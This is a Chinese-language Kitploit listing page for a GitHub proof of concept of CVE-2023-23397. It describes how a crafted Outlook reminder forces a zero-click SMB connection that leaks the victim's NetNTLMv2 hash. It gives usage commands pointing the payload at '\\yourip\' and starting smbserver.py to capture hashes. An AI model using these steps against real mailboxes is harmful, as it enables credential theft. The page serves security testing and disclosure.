Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-23397 — 通过电子邮件发送payload的CVE-2023-23397漏洞的简单PoC。 | Kitploit
工具/GitHubGitHub/trackflaw/cve-2023-23397
钓鱼工具密码攻击Payload生成漏洞分析漏洞利用电子邮件安全
GitHubtrackflaw/cve-2023-23397

CVE-2023-23397

通过电子邮件发送payload的CVE-2023-23397漏洞的简单PoC。

查看仓库
13228303年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-23397

影响 Outlook 胖客户端 的 CVE-2023-23397 漏洞的简单且粗糙的概念验证 (PoC)。

描述

Outlook 在用户输入控制方面存在缺陷,允许配置会议和约会提醒的声音。实际上,攻击者无需用户进行任何操作(零点击漏洞),就能强制受害者连接到自己的服务器。

利用此漏洞的攻击者通过 SMB 请求,会获取基于被诱捕用户密码的 NetNTLMv2 摘要。该请求在邮件到达收件箱时立即触发。

PoC 能做什么?

  1. 生成 .msg 有效负载。
  2. 通过自定义 SMTP 服务器以电子邮件形式发送。

用法

在一个会话中:

root@kitploit:~
python CVE-2023-23397.py

usage: CVE-2023-23397.py [-h] -p PATH
CVE-2023-23397.py: error: the following arguments are required: -p/--path

python CVE-2023-23397.py --path '\\yourip\'

在第二个会话中(根据需要运行 smbserver 或 responder)。

root@kitploit:~
smbserver.py -smb2support SHARE .

演示(手动 PoC)

poc

说明视频(法语)

用 Microsoft OUTLOOK 获取密码 #CVE-2023-23397

原文

https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/

下载工具